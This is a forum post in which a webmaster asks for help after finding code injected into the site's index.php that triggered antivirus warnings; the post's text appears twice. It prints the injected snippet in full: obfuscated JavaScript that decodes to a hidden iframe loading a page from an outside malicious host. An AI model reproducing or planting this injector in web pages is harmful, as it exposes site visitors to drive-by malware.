My forum is located here:
/forum
In the root of my domain, I only have an index.php file which is like a disclaimer, within only basic HTML (Enter/ Don't enter).
Problem is- the past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus.
I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE
It would start using VERY HIGH memory resources, but seem to do nothing else.
After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:
Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.
I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.
I've also changed the index.php file for an index.html file.
I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?
Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.
Can't believe this has happened, after only posting in this thread a couple of days ago!
Is there any way this code has been added to my index.php file because of this? As that's when it all started- as soon as I added dock in rock (I've removed it now).
Thanks for any help.
/forum
In the root of my domain, I only have an index.php file which is like a disclaimer, within only basic HTML (Enter/ Don't enter).
Problem is- the past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus.
I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE
It would start using VERY HIGH memory resources, but seem to do nothing else.
After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:
PHP:
<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'; ?>
Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.
I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.
I've also changed the index.php file for an index.html file.
I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?
Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.
Can't believe this has happened, after only posting in this thread a couple of days ago!
Is there any way this code has been added to my index.php file because of this? As that's when it all started- as soon as I added dock in rock (I've removed it now).
Thanks for any help.